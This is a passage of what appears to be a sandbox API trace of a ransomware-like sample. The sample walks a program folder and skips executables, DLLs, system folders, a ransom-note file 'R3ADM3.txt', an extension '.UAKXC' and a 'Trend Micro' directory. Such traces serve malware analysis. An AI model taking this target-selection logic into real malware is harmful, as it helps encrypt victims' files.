(lpFirst="ASCIIENG.LNG", lpSrch=".sys") returned 0x0 [0158.755] StrStrIW (lpFirst="ASCIIENG.LNG", lpSrch=".msi") returned 0x0 [0158.755] StrStrIW (lpFirst="ASCIIENG.LNG", lpSrch="R3ADM3.txt") returned 0x0 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0908 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0908 | out: hHeap=0xea0000) returned 1 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ae8 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0908 [0158.755] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32cc8 [0158.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf32ae8 | out: hHeap=0xea0000) returned 1 [0158.755] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.755] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d5cf00, ftCreationTime.dwHighDateTime=0x1ca982d, ftLastAccessTime.dwLowDateTime=0x5171bc90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc3d5cf00, ftLastWriteTime.dwHighDateTime=0x1ca982d, nFileSizeHigh=0x0, nFileSizeLow=0x22db8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AUDIOSEARCHLTS.DLL", cAlternateFileName="AUDIOS~1.DLL")) returned 1 [0158.755] lstrcmpW (lpString1="AUDIOSEARCHLTS.DLL", lpString2=".") returned 1 [0158.755] lstrcmpW (lpString1="AUDIOSEARCHLTS.DLL", lpString2="..") returned 1 [0158.755] StrStrIW (lpFirst="AUDIOSEARCHLTS.DLL", lpSrch=".UAKXC") returned 0x0 [0158.755] StrStrIW (lpFirst="AUDIOSEARCHLTS.DLL", lpSrch=".exe") returned 0x0 [0158.755] StrStrIW (lpFirst="AUDIOSEARCHLTS.DLL", lpSrch=".dll") returned=".DLL" [0158.756] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d5cf00, ftCreationTime.dwHighDateTime=0x1ca982d, ftLastAccessTime.dwLowDateTime=0x5f3e3510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc3d5cf00, ftLastWriteTime.dwHighDateTime=0x1ca982d, nFileSizeHigh=0x0, nFileSizeLow=0x197378, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AUDIOSEARCHMAIN.DLL", cAlternateFileName="AUDIOS~3.DLL")) returned 1 [0158.756] lstrcmpW (lpString1="AUDIOSEARCHMAIN.DLL", lpString2=".") returned 1 [0158.756] lstrcmpW (lpString1="AUDIOSEARCHMAIN.DLL", lpString2="..") returned 1 [0158.756] StrStrIW (lpFirst="AUDIOSEARCHMAIN.DLL", lpSrch=".UAKXC") returned 0x0 [0158.756] StrStrIW (lpFirst="AUDIOSEARCHMAIN.DLL", lpSrch=".exe") returned 0x0 [0158.756] StrStrIW (lpFirst="AUDIOSEARCHMAIN.DLL", lpSrch=".dll") returned=".DLL" [0158.756] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3d5cf00, ftCreationTime.dwHighDateTime=0x1ca982d, ftLastAccessTime.dwLowDateTime=0x51741df0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc3d5cf00, ftLastWriteTime.dwHighDateTime=0x1ca982d, nFileSizeHigh=0x0, nFileSizeLow=0x223998, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AUDIOSEARCHSAPIFE.DLL", cAlternateFileName="AUDIOS~2.DLL")) returned 1 [0158.756] lstrcmpW (lpString1="AUDIOSEARCHSAPIFE.DLL", lpString2=".") returned 1 [0158.756] lstrcmpW (lpString1="AUDIOSEARCHSAPIFE.DLL", lpString2="..") returned 1 [0158.756] StrStrIW (lpFirst="AUDIOSEARCHSAPIFE.DLL", lpSrch=".UAKXC") returned 0x0 [0158.756] StrStrIW (lpFirst="AUDIOSEARCHSAPIFE.DLL", lpSrch=".exe") returned 0x0 [0158.756] StrStrIW (lpFirst="AUDIOSEARCHSAPIFE.DLL", lpSrch=".dll") returned=".DLL" [0158.756] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b828500, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b828500, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0x10d88, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AUTHZAX.DLL", cAlternateFileName="")) returned 1 [0158.756] lstrcmpW (lpString1="AUTHZAX.DLL", lpString2=".") returned 1 [0158.756] lstrcmpW (lpString1="AUTHZAX.DLL", lpString2="..") returned 1 [0158.756] StrStrIW (lpFirst="AUTHZAX.DLL", lpSrch=".UAKXC") returned 0x0 [0158.756] StrStrIW (lpFirst="AUTHZAX.DLL", lpSrch=".exe") returned 0x0 [0158.756] StrStrIW (lpFirst="AUTHZAX.DLL", lpSrch=".dll") returned=".DLL" [0158.756] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d39f900, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x66293410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d39f900, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0xc380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSAutogen.dll", cAlternateFileName="BCSAUT~1.DLL")) returned 1 [0158.756] lstrcmpW (lpString1="BCSAutogen.dll", lpString2=".") returned 1 [0158.756] lstrcmpW (lpString1="BCSAutogen.dll", lpString2="..") returned 1 [0158.756] StrStrIW (lpFirst="BCSAutogen.dll", lpSrch=".UAKXC") returned 0x0 [0158.756] StrStrIW (lpFirst="BCSAutogen.dll", lpSrch=".exe") returned 0x0 [0158.756] StrStrIW (lpFirst="BCSAutogen.dll", lpSrch=".dll") returned=".dll" [0158.756] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d39f900, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d39f900, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0x9b60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSClient.Msg.dll", cAlternateFileName="BCSCLI~1.DLL")) returned 1 [0158.757] lstrcmpW (lpString1="BCSClient.Msg.dll", lpString2=".") returned 1 [0158.757] lstrcmpW (lpString1="BCSClient.Msg.dll", lpString2="..") returned 1 [0158.757] StrStrIW (lpFirst="BCSClient.Msg.dll", lpSrch=".UAKXC") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClient.Msg.dll", lpSrch=".exe") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClient.Msg.dll", lpSrch=".dll") returned=".dll" [0158.757] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1067d600, ftCreationTime.dwHighDateTime=0x1cac1f1, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1067d600, ftLastWriteTime.dwHighDateTime=0x1cac1f1, nFileSizeHigh=0x0, nFileSizeLow=0x6886, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSClientManifest.man", cAlternateFileName="BCSCLI~1.MAN")) returned 1 [0158.757] lstrcmpW (lpString1="BCSClientManifest.man", lpString2=".") returned 1 [0158.757] lstrcmpW (lpString1="BCSClientManifest.man", lpString2="..") returned 1 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch=".UAKXC") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch=".exe") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch=".dll") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch=".lnk") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch=".sys") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch=".msi") returned 0x0 [0158.757] StrStrIW (lpFirst="BCSClientManifest.man", lpSrch="R3ADM3.txt") returned 0x0 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0158.757] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.757] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.757] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34cb0 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0930 [0158.757] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34d48 [0158.758] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0158.758] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.758] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd44f00, ftCreationTime.dwHighDateTime=0x1cac1f1, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcd44f00, ftLastWriteTime.dwHighDateTime=0x1cac1f1, nFileSizeHigh=0x0, nFileSizeLow=0x8d51, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSEvents.man", cAlternateFileName="BCSEVE~1.MAN")) returned 1 [0158.758] lstrcmpW (lpString1="BCSEvents.man", lpString2=".") returned 1 [0158.758] lstrcmpW (lpString1="BCSEvents.man", lpString2="..") returned 1 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch=".UAKXC") returned 0x0 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch=".exe") returned 0x0 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch=".dll") returned 0x0 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch=".lnk") returned 0x0 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch=".sys") returned 0x0 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch=".msi") returned 0x0 [0158.758] StrStrIW (lpFirst="BCSEvents.man", lpSrch="R3ADM3.txt") returned 0x0 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0958 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.758] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.758] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.758] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0958 | out: hHeap=0xea0000) returned 1 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0958 [0158.758] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddd40 [0158.758] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.759] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.759] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c6a8100, ftCreationTime.dwHighDateTime=0x1cab7c8, ftLastAccessTime.dwLowDateTime=0x67a61010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2c6a8100, ftLastWriteTime.dwHighDateTime=0x1cab7c8, nFileSizeHigh=0x0, nFileSizeLow=0x11380, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSLaunch.dll", cAlternateFileName="BCSLAU~1.DLL")) returned 1 [0158.759] lstrcmpW (lpString1="BCSLaunch.dll", lpString2=".") returned 1 [0158.759] lstrcmpW (lpString1="BCSLaunch.dll", lpString2="..") returned 1 [0158.759] StrStrIW (lpFirst="BCSLaunch.dll", lpSrch=".UAKXC") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSLaunch.dll", lpSrch=".exe") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSLaunch.dll", lpSrch=".dll") returned=".dll" [0158.759] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4052c000, ftCreationTime.dwHighDateTime=0x1cac269, ftLastAccessTime.dwLowDateTime=0x575e0870, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4052c000, ftLastWriteTime.dwHighDateTime=0x1cac269, nFileSizeHigh=0x0, nFileSizeLow=0x21980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSProxy.dll", cAlternateFileName="")) returned 1 [0158.759] lstrcmpW (lpString1="BCSProxy.dll", lpString2=".") returned 1 [0158.759] lstrcmpW (lpString1="BCSProxy.dll", lpString2="..") returned 1 [0158.759] StrStrIW (lpFirst="BCSProxy.dll", lpSrch=".UAKXC") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSProxy.dll", lpSrch=".exe") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSProxy.dll", lpSrch=".dll") returned=".dll" [0158.759] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4183ed00, ftCreationTime.dwHighDateTime=0x1cac269, ftLastAccessTime.dwLowDateTime=0x568a2e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4183ed00, ftLastWriteTime.dwHighDateTime=0x1cac269, nFileSizeHigh=0x0, nFileSizeLow=0x95d80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSRuntime.dll", cAlternateFileName="BCSRUN~1.DLL")) returned 1 [0158.759] lstrcmpW (lpString1="BCSRuntime.dll", lpString2=".") returned 1 [0158.759] lstrcmpW (lpString1="BCSRuntime.dll", lpString2="..") returned 1 [0158.759] StrStrIW (lpFirst="BCSRuntime.dll", lpSrch=".UAKXC") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSRuntime.dll", lpSrch=".exe") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSRuntime.dll", lpSrch=".dll") returned=".dll" [0158.759] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d39f900, ftCreationTime.dwHighDateTime=0x1cac1f4, ftLastAccessTime.dwLowDateTime=0x67a3aeb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1d39f900, ftLastWriteTime.dwHighDateTime=0x1cac1f4, nFileSizeHigh=0x0, nFileSizeLow=0x3780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSRuntimeUI.dll", cAlternateFileName="BCSRUN~2.DLL")) returned 1 [0158.759] lstrcmpW (lpString1="BCSRuntimeUI.dll", lpString2=".") returned 1 [0158.759] lstrcmpW (lpString1="BCSRuntimeUI.dll", lpString2="..") returned 1 [0158.759] StrStrIW (lpFirst="BCSRuntimeUI.dll", lpSrch=".UAKXC") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSRuntimeUI.dll", lpSrch=".exe") returned 0x0 [0158.759] StrStrIW (lpFirst="BCSRuntimeUI.dll", lpSrch=".dll") returned=".dll" [0158.760] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4183ed00, ftCreationTime.dwHighDateTime=0x1cac269, ftLastAccessTime.dwLowDateTime=0x6b22b3b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4183ed00, ftLastWriteTime.dwHighDateTime=0x1cac269, nFileSizeHigh=0x0, nFileSizeLow=0x28f80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSStr32.dll", cAlternateFileName="")) returned 1 [0158.760] lstrcmpW (lpString1="BCSStr32.dll", lpString2=".") returned 1 [0158.760] lstrcmpW (lpString1="BCSStr32.dll", lpString2="..") returned 1 [0158.760] StrStrIW (lpFirst="BCSStr32.dll", lpSrch=".UAKXC") returned 0x0 [0158.760] StrStrIW (lpFirst="BCSStr32.dll", lpSrch=".exe") returned 0x0 [0158.760] StrStrIW (lpFirst="BCSStr32.dll", lpSrch=".dll") returned=".dll" [0158.760] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4183ed00, ftCreationTime.dwHighDateTime=0x1cac269, ftLastAccessTime.dwLowDateTime=0x5812f0f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4183ed00, ftLastWriteTime.dwHighDateTime=0x1cac269, nFileSizeHigh=0x0, nFileSizeLow=0x1b780, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BCSSync.exe", cAlternateFileName="")) returned 1 [0158.760] lstrcmpW (lpString1="BCSSync.exe", lpString2=".") returned 1 [0158.760] lstrcmpW (lpString1="BCSSync.exe", lpString2="..") returned 1 [0158.760] StrStrIW (lpFirst="BCSSync.exe", lpSrch=".UAKXC") returned 0x0 [0158.760] StrStrIW (lpFirst="BCSSync.exe", lpSrch=".exe") returned=".exe" [0158.760] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x457bf900, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0x5f61e9b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x457bf900, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x65ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bdcmetadata.xsd", cAlternateFileName="BDCMET~2.XSD")) returned 1 [0158.760] lstrcmpW (lpString1="bdcmetadata.xsd", lpString2=".") returned 1 [0158.760] lstrcmpW (lpString1="bdcmetadata.xsd", lpString2="..") returned 1 [0158.760] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch=".UAKXC") returned 0x0 [0158.760] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch=".exe") returned 0x0 [0158.760] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch=".dll") returned 0x0 [0158.760] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch=".lnk") returned 0x0 [0158.760] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch=".sys") returned 0x0 [0158.760] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch=".msi") returned 0x0 [0158.761] StrStrIW (lpFirst="bdcmetadata.xsd", lpSrch="R3ADM3.txt") returned 0x0 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0980 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.761] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.761] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.761] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e0980 | out: hHeap=0xea0000) returned 1 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedccc8 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e0980 [0158.761] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd900 [0158.761] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedccc8 | out: hHeap=0xea0000) returned 1 [0158.762] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.762] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x457bf900, ftCreationTime.dwHighDateTime=0x1cac036, ftLastAccessTime.dwLowDateTime=0x5197d290, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x457bf900, ftLastWriteTime.dwHighDateTime=0x1cac036, nFileSizeHigh=0x0, nFileSizeLow=0x3321, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bdcmetadataresource.xsd", cAlternateFileName="BDCMET~1.XSD")) returned 1 [0158.762] lstrcmpW (lpString1="bdcmetadataresource.xsd", lpString2=".") returned 1 [0158.762] lstrcmpW (lpString1="bdcmetadataresource.xsd", lpString2="..") returned 1 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch=".UAKXC") returned 0x0 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch=".exe") returned 0x0 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch=".dll") returned 0x0 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch=".lnk") returned 0x0 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch=".sys") returned 0x0 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch=".msi") returned 0x0 [0158.762] StrStrIW (lpFirst="bdcmetadataresource.xsd", lpSrch="R3ADM3.txt") returned 0x0 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34b80 [0158.762] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.762] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.762] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34cb0 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e09a8 [0158.762] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x90) returned 0xf34de0 [0158.763] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34cb0 | out: hHeap=0xea0000) returned 1 [0158.763] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xf34b80 | out: hHeap=0xea0000) returned 1 [0158.763] FindNextFileW (in: hFindFile=0xecfb60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51422110, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f409670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0158.763] lstrcmpW (lpString1="Bibliography", lpString2=".") returned 1 [0158.763] lstrcmpW (lpString1="Bibliography", lpString2="..") returned 1 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="tmp") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="winnt") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="temp") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="thumb") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="$Recycle.Bin") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="$RECYCLE.BIN") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="System Volume Information") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="Boot") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="Windows") returned 0x0 [0158.763] StrStrIW (lpFirst="Bibliography", lpSrch="Trend Micro") returned 0x0 [0158.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e09d0 [0158.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec8a0 [0158.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec970 [0158.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x8e) returned 0xf34b80 [0158.763] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec970 | out: hHeap=0xea0000) returned 1 [0158.763] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec8a0 | out: hHeap=0xea0000) returned 1 [0158.763] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x73e09d0 | out: hHeap=0xea0000) returned 1 [0158.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0x73e09d0 [0158.763] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xf32ae8 [0158.763] HeapFree 